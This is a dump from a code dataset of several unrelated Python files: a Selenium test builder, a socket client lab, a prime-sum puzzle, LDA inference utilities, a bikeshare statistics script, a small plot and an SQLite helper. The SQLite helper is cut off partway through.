{1} \\\"{2}\\\"\".format(info[\"command\"], info[\"assert\"], info[\"title_expected\"])\n self.test.TestStart()\n self.wait_for_page_title(info[\"title_expected\"])\n info[\"title_loaded\"] = self.driver.title.encode('utf-8')\n try:\n if info[\"assert\"] == \"equals\": self.assertEquals(info[\"title_loaded\"].lower(), info[\"title_expected\"].lower())\n else: self.assertRegexpMatches(info[\"title_loaded\"].lower(), info[\"title_expected\"].lower())\n \n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except AssertionError:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = 'Unexpected title: \"{0}\" instead of \"{1}\"'.format(info[\"title_loaded\"], info[\"title_expected\"])\n self.test.TestResults(info)\n return False\n\n def get_element(self, name, value):\n byCommand = {\n \"id\": By.ID,\n \"xpath\": By.XPATH,\n \"link_text\": By.LINK_TEXT,\n \"partial_link_text\": By.PARTIAL_LINK_TEXT,\n \"name\": By.NAME,\n \"tag_name\": By.TAG_NAME,\n \"class_name\": By.CLASS_NAME,\n \"css_selector\": By.CSS_SELECTOR\n }\n return WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((byCommand.get(name), value)))\n\n def wait_for_it(self, **info):\n info[\"description\"] = \"Wait {0} seconds\".format(info[\"seconds\"])\n self.test.TestStart()\n try:\n time.sleep(int(info.get(\"seconds\")))\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n self.test.TestResults(info)\n return False\n\n def get_current_element_attribute(self, **info):\n info[\"description\"] = \"Get \\\"{0}\\\" attribute of current element\".format(info.get(\"attribute\"))\n self.test.TestStart()\n try:\n info[info.get(\"attribute\")] = self.current_element.get_attribute(info.get(\"attribute\"))\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to get \\\"{0}\\\" attribute of current element\".format(info[\"attribute\"])\n self.test.TestResults(info)\n return False\n\n def find_element(self, **info):\n info[\"description\"] = \"{0} element with {1} \\\"{2}\\\"\".format(info[\"command\"], info[\"element_name\"], info[\"element_value\"])\n self.test.TestStart()\n try:\n self.current_element = self.get_element(info[\"element_name\"], info[\"element_value\"])\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to locate element: {0}=\\\"{1}\\\"\".format(info[\"element_name\"], info[\"element_value\"])\n self.test.TestResults(info)\n return False\n\n def switch_to(self, **info):\n info[\"description\"] = \"{0} {1} with name \\\"{2}\\\"\".format(info[\"command\"], info[\"element_name\"], info[\"element_value\"])\n self.test.TestStart()\n try:\n if info.get(\"element_name\") == \"Frame\":\n self.driver.switch_to.default_content()\n frame = self.get_element(\"name\", info.get(\"element_value\"))\n self.driver.switch_to.frame(frame)\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to locate element: {0}=\\\"{1}\\\"\".format(info[\"element_name\"], info[\"element_value\"])\n self.test.TestResults(info)\n return False\n\n def click_element(self, **info):\n try:\n info[\"description\"] = \"{0} element with {1} \\\"{2}\\\"\".format(info[\"command\"], info[\"element_name\"], info[\"element_value\"])\n self.test.TestStart()\n self.current_element = self.get_element(info[\"element_name\"], info[\"element_value\"])\n self.current_element.click()\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except TimeoutException:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Timeout waiting for element with {0}=\\\"{1}\\\".\".format(info[\"element_name\"], info[\"element_value\"])\n self.test.TestResults(info)\n return False\n except NoSuchElementException:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unable to locate element with {0}=\\\"{1}\\\".\".format(info[\"element_name\"], info[\"element_value\"])\n self.test.TestResults(info)\n return False\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Unknown error occured\"\n self.test.TestResults(info)\n return False\n\n def enter_text(self, **info):\n try:\n info['description'] = \"Enter text \\\"{0}\\\"\".format(info.get('text'))\n self.test.TestStart()\n self.current_element.click()\n self.current_element.send_keys(info['text'])\n self.assertEqual(self.current_element.get_attribute('value'),info['text'])\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Text entry was not successful\"\n self.test.TestResults(info)\n return False\n\n def health_check(self, **info):\n try:\n info['description'] = \"Evaluate Health Check results\"\n self.test.TestStart()\n healthcheck = json.loads(strip_tags(self.driver.page_source).strip())\n failed = False\n key = info.get('key') if info.get('key') != None and len(info.get('key')) > 0 else \"isHealthy\"\n for category in healthcheck:\n if type(healthcheck[category]) == list:\n for dependency in healthcheck[category]:\n if type(dependency) == dict:\n result = dependency.get(key)\n if result == None:\n failed = {\"error\": \"The provided key was not found in the Health Check results\"}\n elif str(result).lower() not in [\"true\", \"1\"]:\n failed = dependency\n self.assertEqual(failed, False)\n self.test.TestFinish()\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n return True\n except AssertionError:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = 'A dependency has failed the Health Check'\n info.update(failed)\n self.test.TestResults(info)\n return False\n except:\n self.test.TestFinish()\n info['status'] = \"Failed\"\n info['error'] = \"Failed to parse Health Check results\"\n self.test.TestResults(info)\n return false\n\n def go_to_url(self, **info):\n info['description'] = \"Go to url {0}\".format(info[\"url\"])\n result = True\n neterror = False\n access_error = 0\n toast_error = 0\n try:\n self.test.TestStart()\n self.driver.get(info[\"url\"])\n try:\n page_title = self.driver.title.encode('utf-8').lower()\n # Check for blank title\n if len(page_title) == 0:\n # Pause a couple of seconds to wait for potential redirects and try grabbing the title again\n time.sleep(2)\n page_title = self.driver.title.encode('utf-8').lower()\n # If grabbing the title fails because of an existing alert, dismiss it\n except UnexpectedAlertPresentException:\n try:\n while True:\n time.sleep(1)\n Alert(self.driver).dismiss()\n except NoAlertPresentException:\n page_title = self.driver.title.encode('utf-8').lower()\n if len(page_title) == 0:\n access_error = strip_tags(self.driver.page_source).strip()\n\n info['url_loaded'] = self.driver.current_url\n self.test.TestFinish()\n\n # Look for access errors after dismissing a prompt\n self.assertEqual(access_error,0)\n\n # Look for the presence of custom Toast error element being displayed on the page\n try:\n toast_message = self.driver.find_element_by_class_name(\"toast-message\")\n toast_error = toast_message.get_attribute('innerHTML')\n except:\n toast_error = 0\n\n # Check for PNNL Toast error\n self.assertEqual(toast_error,0)\n\n # Check for an Apology page redirect\n self.assertNotRegexpMatches(self.driver.current_url, r'apology|outage', 1)\n \n # Check for errors in the page title\n self.assertNotRegexpMatches(page_title, r'\\D?[45]\\d\\d\\D', 2)\n self.assertNotRegexpMatches(page_title, r'problem|failed|not\\savailable|error|denied', 3)\n\n # Check for neterror class on body in Chrome\n if self.test.results['environment']['browser']['name'] in [\"Chrome\",\"ChromeIncognito\"]:\n try:\n neterror = self.driver.find_element_by_xpath('/html/body[@class=\"neterror\"]//div[@id=\"main-message\"]').get_attribute('innerText')\n except:\n neterror = False\n\n self.assertEqual(neterror, False)\n\n # If no page title, check for blank page\n self.assertNotEqual(len(page_title),0)\n\n # Success\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n # Handle assertion errors\n except AssertionError as error:\n result = False\n errornum = error[0][0]\n try:\n # Check for access denied errors\n if 'page_title' in locals():\n self.assertNotRegexpMatches(page_title, r'40[13]\\D')\n self.assertNotIn('denied',page_title)\n\n if access_error:\n info['status'] = 'Warning'\n info['error'] = access_error\n self.test.TestResults(info)\n\n # Handle \"Toast\" errors\n elif toast_error:\n info['status'] = 'Failed'\n info['error'] = toast_error\n self.test.TestResults(info)\n\n # Handle Chrome neterror\n elif neterror:\n info['status'] = 'Failed'\n info['error'] = neterror\n self.test.TestResults(info)\n\n # Handle blank title\n elif errornum == \"0\":\n error = strip_tags(self.driver.page_source).strip()\n if len(error) == 0:\n error = \"Blank Page Loaded\"\n try:\n self.assertTrue(len(error) < 1000) # Likely page loaded but page title wasn't caught in time\n self.assertRegexpMatches(error.lower(), r'[45]\\d{2}\\D|error|^blank') # Check for status codes or errors in the source\n info['status'] = 'Failed'\n info['error'] = error\n self.test.TestResults(info)\n except:\n # No page title, but source looks ok\n result = True\n info['status'] = \"Passed\"\n self.test.TestResults(info)\n\n # Handle redirect to apology page\n elif errornum == \"1\":\n try:\n heading = self.driver.find_element_by_tag_name('h1').get_attribute('innerHTML')\n self.assertRegexpMatches(heading, r'^Planned')\n info['status'] = 'Warning'\n info['error'] = error\n self.test.TestResults(info)\n except AssertionError:\n info['status'] = 'Failed'\n info['error'] = page_title\n self.test.TestResults(info)\n\n # Handle errors found in the title\n elif errornum.isdigit():\n info['status'] = 'Failed'\n info['error'] = page_title\n self.test.TestResults(info)\n\n # Handle unknown errors\n else:\n error = 'An unknown error occured: {0}'.format(page_title)\n info['status'] = 'Failed'\n info['error'] = error\n self.test.TestResults(info)\n # Handle access denied errors as a warning\n except AssertionError:\n info['status'] = 'Warning'\n info['error'] = page_title\n self.test.TestResults(info)\n # Handle page timeout\n except TimeoutException:\n result = False\n error = 'Timeout: Page did not load within 30 seconds'\n # Check for the presence of an alert, likely caused by login prompt\n try:\n alert = False\n while True:\n Alert(self.driver).dismiss()\n alert = True\n except NoAlertPresentException:\n self.test.TestFinish()\n if alert == True:\n info['status'] = 'Warning'\n info['error'] = 'Test account denied access'\n self.test.TestResults(info)\n else:\n info['status'] = 'Failed'\n info['error'] = error\n self.test.TestResults(info)\n # Capture neterror if Firefox fails to load the page\n except WebDriverException as error:\n result = False\n self.test.TestFinish()\n info['status'] = 'Failed'\n info['error'] = self.driver.find_element_by_id(\"errorLongContent\").get_attribute(\"innerText\")\n self.test.TestResults(info)\n # Handle unknown exceptions\n except:\n result = False\n self.test.TestFinish()\n info['status'] = 'Failed'\n info['error'] = 'An unknown error occured: {0}'.format(page_title)\n self.test.TestResults(info)\n raise\n finally:\n return result\n\n def is_alert_present(self):\n try: self.driver.switch_to_alert()\n except NoAlertPresentException as e: return False\n return True\n\n def close_alert_and_get_its_text(self):\n try:\n alert = self.driver.switch_to_alert()\n alert_text = alert.text\n if self.accept_next_alert:\n alert.accept()\n else:\n alert.dismiss()\n return alert_text\n finally: self.accept_next_alert = True\n\n def wait_for_page_load(self):\n old_page = self.driver.find_element_by_tag_name('html')\n try:\n self.wait = WebDriverWait(self.driver, 5)\n self.wait.until(\n lambda x: old_page.id != self.driver.find_element_by_tag_name('html').id\n )\n return True\n except TimeoutException:\n return False\n\n def wait_for_page_title(self, title):\n try:\n self.wait = WebDriverWait(self.driver, 5)\n self.wait.until(\n lambda x: title.lower() in self.driver.title.lower()\n )\n return True\n except TimeoutException:\n return False\n\n def tearDown(self):\n self.driver.get('about:blank')\n self.driver.delete_all_cookies()","sub_path":"TestBuilder.py","file_name":"TestBuilder.py","file_ext":"py","file_size_in_byte":25983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"644247168","text":"import socket\nimport sys\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nexcept socket.error as msg:\n print('Socket creation Failed. Error code: ' + str(msg[0]) + ', Message: ' + msg[1])\n sys.exit()\nprint('Socket created.')\nhost, port = socket.gethostname(), 1234\n# Connect to the server\ns.connect((host, port))\nprint('Successfully connected.')\ns.close()\n","sub_path":"lab02/example3_1_client.py","file_name":"example3_1_client.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"456028108","text":"from math import sqrt\nfrom itertools import count, islice\n\n__author__ = 'Bruno'\n\n\n\"\"\"\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\nFind the sum of all the primes below two million.\n\"\"\"\n\n\ndef is_prime(n):\n if n < 2:\n return False\n for number in islice(count(2), int(sqrt(n)-1)):\n if not n % number:\n return False\n return True\n\n\ndef sum_of_primes(number):\n total = 0\n for x in range(number):\n if is_prime(x):\n total += x\n return total\n\nprint(sum_of_primes(2000000))\n","sub_path":"Problem 10 - Summation of primes.py","file_name":"Problem 10 - Summation of primes.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238607627","text":"import math\nimport globalatt\n\ndef doc_e_step(document, gamma, phi, model, ss):\n\n # posterior inference\n\n likelihood = lda_inference(document, model, gamma, phi)\n\n # update sufficient statistics\n\n gamma_sum = 0\n for k in range(0, model.num_topics):\n\n gamma_sum += gamma[k]\n ss.alpha_suffstats += digamma(gamma[k])\n\n ss.alpha_suffstats -= model.num_topics * digamma(gamma_sum)\n\n for n in range(0, document.length):\n\n for k in range(0, model.num_topics):\n\n ss.class_word[k][document.words[n]] += document.word_counts[n] * phi[n][k]\n ss.class_total[k] += document.word_counts[n] * phi[n][k]\n\n ss.num_docs = ss.num_docs + 1\n\n return likelihood\n\n\ndef log_sum(log_a, log_b):\n v = None\n\n if (log_a < log_b):\n v = log_b + math.log(1 + math.exp(log_a - log_b))\n\n else:\n v = log_a + math.log(1 + math.exp(log_b - log_a))\n\n return v\n\ndef digamma(x):\n x = x + 6\n p = 1 / (x * x)\n p = (((0.004166666666667 * p - 0.003968253986254)\\\n * p + 0.008333333333333)\\\n * p - 0.083333333333333) * p\n\n p = p + math.log(x) -0.5\\\n /x - 1/(x - 1) -1/(x - 2) - 1\\\n /(x - 3) - 1/(x - 4) - 1/(x - 5) - 1/(x - 6)\n\n return p\n\ndef trigamma(x):\n\n x=x+6\n p=1/(x*x)\n p=(((((0.075757575757576 * p-0.033333333333333)\\\n * p + 0.0238095238095238) * p - 0.033333333333333)\\\n * p + 0.166666666666667) * p + 1) / x + 0.5 * p\n\n for i in range(0,6):\n x=x-1\n p=1/(x*x)+p\n\n return(p)\n\n#\n# Variational Inference\n#\ndef lda_inference(document, model, var_gamma, phi):\n converged = 1\n phisum = 0\n likelihood = 0\n likelihood_old = 0.00000001\n oldphi = [0 for x in range(model.num_topics)]\n digamma_gam = [0 for x in range(model.num_topics)]\n\n # compute posterior dirichlet\n\n for k in range(0, model.num_topics):\n\n var_gamma[k] = model.alpha + (document.total_words/(model.num_topics))\n digamma_gam[k] = digamma(var_gamma[k])\n\n for n in range(0, document.length):\n phi[n][k] = 1.0 / model.num_topics\n\n var_iter = 0\n\n while ((converged > globalatt.VAR_CONVERGED) and ((var_iter < globalatt.VAR_MAX_ITER) or (globalatt.VAR_MAX_ITER == -1))):\n var_iter = var_iter + 1\n for n in range(0, document.length):\n\n phisum = 0\n for k in range(0, model.num_topics):\n\n oldphi[k] = phi[n][k]\n phi[n][k] = digamma_gam[k] + model.log_prob_w[k][document.words[n]]\n\n if (k > 0):\n phisum = log_sum(phisum, phi[n][k])\n else:\n phisum = phi[n][k]; # note, phi is in log space\n\n\n for k in range(0, model.num_topics):\n\n phi[n][k] = math.exp(phi[n][k] - phisum)\n var_gamma[k] = var_gamma[k] + document.word_counts[n]\\\n * (phi[n][k] - oldphi[k])\n # !!! a lot of extra digamma's here because of how we're computing it\n # !!! but its more automatically updated too.\n digamma_gam[k] = digamma(var_gamma[k])\n\n\n likelihood = compute_likelihood(document, model, phi, var_gamma);\n converged = (likelihood_old - likelihood) / likelihood_old;\n likelihood_old = likelihood;\n\n # printf(\"[LDA INF] %8.5f %1.3e\\n\", likelihood, converged);\n\n return likelihood\n\n\ndef compute_likelihood(document, model, phi, var_gamma):\n likelihood = 0\n digsum = 0\n var_gamma_sum = 0\n dig = [0 for x in range(model.num_topics)]\n\n for k in range(0, model.num_topics):\n dig[k] = digamma(var_gamma[k])\n var_gamma_sum = var_gamma[k] + var_gamma_sum\n\n digsum = digamma(var_gamma_sum)\n\n likelihood = math.lgamma(model.alpha * model.num_topics)\\\n - model.num_topics * math.lgamma(model.alpha)\\\n - (math.lgamma(var_gamma_sum))\n\n for k in range(0, model.num_topics):\n likelihood = ((model.alpha - 1) * (dig[k] - digsum)\\\n + math.lgamma(var_gamma[k]) - (var_gamma[k] - 1)\\\n * (dig[k] - digsum)) + likelihood\n\n for n in range(0, document.length):\n if (phi[n][k] > 0):\n likelihood += document.word_counts[n] * \\\n (phi[n][k]*((dig[k] - digsum)\\\n - math.log(phi[n][k]) \\\n + model.log_prob_w[k][document.words[n]]))\n\n return likelihood\n\n\n# newtons method\ndef opt_alpha(ss, D, K):\n\n init_a = 100\n iter = 0\n\n log_a = math.log(init_a)\n\n\n iter += 1\n a = math.exp(log_a)\n if (math.isnan(a)):\n\n init_a = init_a * 10\n print(\"warning : alpha is nan; new init = %5.5f\" % init_a)\n a = init_a\n log_a = math.log(a)\n\n f = alhood(a, ss, D, K)\n df = d_alhood(a, ss, D, K)\n d2f = d2_alhood(a, D, K)\n log_a = log_a - df/(d2f * a + df)\n print(\"alpha maximization : %5.5f %5.5f\" % (f, df))\n\n while ((math.fabs(df) > globalatt.NEWTON_THRESH) and\\\n (iter < globalatt.MAX_ALPHA_ITER)):\n\n iter += 1\n a = math.exp(log_a)\n if (math.isnan(a)):\n\n init_a = init_a * 10\n print(\"warning : alpha is nan; new init = %5.5f\" % init_a)\n a = init_a\n log_a = math.log(a)\n\n f = alhood(a, ss, D, K)\n df = d_alhood(a, ss, D, K)\n d2f = d2_alhood(a, D, K)\n log_a = log_a - df/(d2f * a + df)\n print(\"alpha maximization : %5.5f %5.5f\" % (f, df))\n\n return(math.exp(log_a))\n\ndef alhood(a, ss, D, K):\n return(D * (math.lgamma(K * a) - K * math.lgamma(a)) + (a - 1) * ss)\n\ndef d_alhood(a, ss, D, K):\n return(D * (K * digamma(K * a) - K * digamma(a)) + ss)\n\ndef d2_alhood(a, D, K):\n return(D * (K * K * trigamma(K * a) - K * trigamma(a)))\n\ndef argmax(x, n):\n max = x[0]\n argmax = 0;\n for i in range(1, n):\n\n if (x[i] > max):\n max = x[i]\n argmax = i\n\n return argmax\n","sub_path":"lda/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434724580","text":"from random import sample\r\n\r\n\r\ndef still_readable(your_string):\r\n \"\"\"\r\n prints your string with shuffled middle letters of each word in a sentence\r\n :return: None\r\n \"\"\"\r\n get_str = []\r\n for word in your_string.split():\r\n if len(word) > 3:\r\n get_str.append(word[0] + ''.join(sample([i for i in word[1:-1]], len(word) - 2)) + word[-1])\r\n else:\r\n get_str.append(word)\r\n print(*get_str) # or you may use > return ' '.join(words)\r\n\r\n\r\nstill_readable('Здесь должна быть шутка про Штирлица')\r\n","sub_path":"ДЗ№11/11..6.py","file_name":"11..6.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"589640739","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('\\nHello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n city=input('Please select a city from the list : \"Washington\", \"New York City\", \"Chicago\" : ').strip().lower()\n while city not in ['chicago', 'new york city', 'washington']:\n city=input(\"\\nPlease try again, that is not a city from the provided list\").strip().lower()\n print(\"OK, City {} will be analyzed below! \\n\".format(city).title())\n\n\n # get user input for month (all, january, february, ... , june)\n month=input('Please specify a month (if needed), or choose \"ALL\" : \"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"ALL\" : ').strip().lower()\n while month not in ['january', 'february', 'march', 'april', 'may', 'june', 'all']:\n month=input(\"Please try again, there is no data for this month or the input was incorrect \").strip().lower()\n print(\"Thank you, the Month filter was set to {}! \\n\".format(month).title())\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n day=input('Please specify a day (if needed), or choose \"ALL\" : \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\", \"ALL\" : ').strip().lower()\n while day not in ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']:\n day=input(\"Please try again, something in the input was incorrect \").strip().lower()\n print(\"Thank you, the Day filter was set to {}! \\n\".format(day).title())\n\n print('-'*30)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.day_name()\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n print('-'*30)\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # display the most common month\n popular_month = df['month'].mode()[0]\n print('Most Popular Month:', popular_month)\n\n\n # display the most common day of week\n popular_day_of_week = df['day_of_week'].mode()[0]\n print('Most Popular day of week:', popular_day_of_week)\n\n\n # display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n popular_hour = df['hour'].mode()[0]\n print('Most Frequent Start Hour:', popular_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*30)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n popular_station_sta = df['Start Station'].mode()[0]\n print('\\nMost Common Start station:\\n', popular_station_sta)\n\n # display most commonly used end station\n popular_station_end = df['End Station'].mode()[0]\n print('\\nMost Common End station:\\n', popular_station_end)\n\n # display most frequent combination of start station and end station trip\n df['Combination_sta_end'] =\"FROM: \" + df['Start Station'] +\" TO: \"+ df['End Station']\n popular_combination_sta_end = df['Combination_sta_end'].mode()[0]\n print('\\nMost Frequent Trip (combination of start and end station):\\n', popular_combination_sta_end)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*30)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print(\"\\nTotal trip duration was \\n\", time.strftime(\"%j:%H:%M:%S\", time.gmtime(df['Trip Duration'].sum())))\n # display mean travel time\n print(\"\\nAvarage trip duration was \\n\", time.strftime(\"%H:%M:%S\", time.gmtime(df['Trip Duration'].mean())))\n\n print(\"\\nThis took %s seconds.\\n\" % (time.time() - start_time))\n print('-'*30)\n\n\ndef user_stats(df):\n \"\"\"Displays the following statistics on bikeshare users.\n\n #1 Popular times of travel (i.e., occurs most often in the start time)\n most common month\n most common day of week\n most common hour of day\n\n #2 Popular stations and trip\n most common start station\n most common end station\n most common trip from start to end (i.e., most frequent combination of start station and end station)\n\n #3 Trip duration\n total travel time\n average travel time\n\n #4 User info\n counts of each user type\n counts of each gender (only available for NYC and Chicago)\n earliest, most recent, most common year of birth (only available for NYC and Chicago)\n \"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print(\"\\nReport for the user types is below\")\n user_types = df['User Type'].value_counts()\n print(user_types)\n\n # Display counts of gender\n print(\"\\nReport for the Gender types is below\")\n try:\n gender_types = df['Gender'].value_counts()\n print(gender_types)\n except Exception as exception_gender:\n print(\"\\nSorry, We could not generate this report, no such data input was found: {} \\n\" .format(exception_gender))\n\n # Display earliest, most recent, and most common year of birth\n print(\"\\nReport for the Birth Years is below\")\n try:\n min_birth_year = df['Birth Year'].min()\n print(\"The Earliest Birth Year is : \", min_birth_year)\n max_birth_year = df['Birth Year'].max()\n print(\"The Most Recent Birth Year is : \", max_birth_year)\n popular_birth_year = df['Birth Year'].mode()[0]\n print(\"The Most common Birth Year is : \", popular_birth_year)\n except Exception as exception_year:\n print(\"\\nSorry, We could not generate this report, no such data input was found: {} \\n\".format(exception_year))\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*30)\n\ndef raw_decision(df):\n\n \"\"\"Displays raw data upon request.\n Function prompts the user if they want to see 5 lines of raw data,\n displays the data if the answer is 'yes' and continue with the prompts\n and displays until the user says 'no' or something else, which is not 'yes'\"\"\"\n\n raw_decision = input(\"\\nWould you like to see 5 lines of RAW data, type yes or no?\\n\").strip().lower()\n while raw_decision.lower() != 'no':\n starting_point=0\n ending_point=5\n cont =\"yes\"\n while cont == \"yes\":\n print(df.iloc[starting_point:ending_point,:])\n cont = input(\" Shall we continue, do you want to see the next fiive rows? Enter - yes or no?\")\n starting_point+=5\n ending_point+=5\n if cont != \"yes\":\n raw_decision = \"no\"\n print('-'*30)\n print(\"Thank you, that was the end of the RAW DATA report\\n\")\n\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n raw_decision(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"320977043","text":"'''\nCreated on 2017. 9. 12.\n\n@author: callor\n'''\na = [10,20,20,30,40,50,60,70]\nlabel = [\"Blue\",\"Green\",\"Red\",\"Cyan\",\"Magenta\",\"Yello\",\"Black\",\"White\"]\n\nfrom matplotlib.pyplot import *\nfigure()\npie(a,labels=label)\n# b,g,r,c,m,y,k,w\nshow()","sub_path":"MatplotPRJ/Basic02/Pie01.py","file_name":"Pie01.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"513529271","text":"#!/usr/bin/env python\n'''\n\n # Create database and insert 10 rows of fake data\n $ python rdbsm.py 1 10\n\n # Query all fake data\n $ python rdbsm.py 2\n\n # Delete database\n $ python rdbsm.py 3\n\n'''\nfrom sqlite3 import connect\nfrom os.path import abspath, dirname, exists, join\n\n\nclass SQLite3(object):\n ''' class '''\n def __init__(self):\n\n base_dir = dirname(abspath(__file__))\n filename = 'messages.db'\n self.db_fname = join(base_dir, filename)\n\n\n def _create_table(self):\n\n self.cursor.execute(\n '''\n CREATE TABLE messages (\n ID INTEGER PRIMARY KEY,\n name varchar(64) NOT NULL,\n content varchar(512) NOT NULL)\n ''')\n\n\n def _insert_data(self, val_list):\n\n str1 = \"INSERT INTO {}\".format('messages')\n str2 = \"({})\".format(', '.join(['name', 'content']))\n str3 = \"VALUES ('{}', '{}')\".format(val_list[0], val_list[1])\n\n self.cursor.execute(\"{} {} {}\".format(str1, str2, str3))\n\n\n def _query(self):\n\n self.rows = self.cursor.execute(\n '''\n SELECT * FROM messages\n ''')\n\n\n def insert_database(self, create=True, val_list=None):\n\n # Create connection object\n self.conn = connect(self.db_fname)\n\n # Create cursor object\n self.cursor = self.conn.cursor()\n\n if create:\n # Create a table\n self._create_table()\n\n if isinstance(val_list, list):\n # Insert a row of data\n self._insert_data(val_list)\n\n # Commit (save) the changes\n self.conn.commit()\n\n # Closing connection\n self.conn.close()\n\n\n def query_database(self):\n\n if exists(self.db_fname):\n\n # Create connection object\n self.conn = connect(self.db_fname)\n\n # Create cursor object\n self.cursor = self.conn.cursor()\n\n try:\n\n # Perform query\n self._query()\n\n for row in self.rows:\n yield row\n\n except:\n\n pass\n\n # Closing connection\n self.conn.close()\n\n\nif __name__ == '__main__':\n\n def main_insert(n=1):\n\n from faker import Faker\n\n SQLdb = SQLite3()\n\n while n > 0:\n val_list = [Faker().name(), Faker().text()]\n SQLdb.insert_database(not exists(SQLdb.db_fname), val_list=val_list)\n n -= 1\n\n\n def main_query():\n\n SQLdb = SQLite3()\n rows = SQLdb.query_database()\n\n for name_id, name, content in rows:\n print()\n print(name_id)\n print(name)\n print(content)\n print()\n\n\n def main_delete():\n\n from os import system\n\n SQLdb = SQLite3()\n\n if exists(SQLdb.db_fname):\n system('rm -fv {}'.format(SQLdb.db_fname))\n\n\n def main():\n\n from sys import argv\n\n # input arguments\n method = 1 if len(argv) == 1 else int(argv[1])\n n = int(argv[2]) if len(argv) == 3 else 1\n\n # method 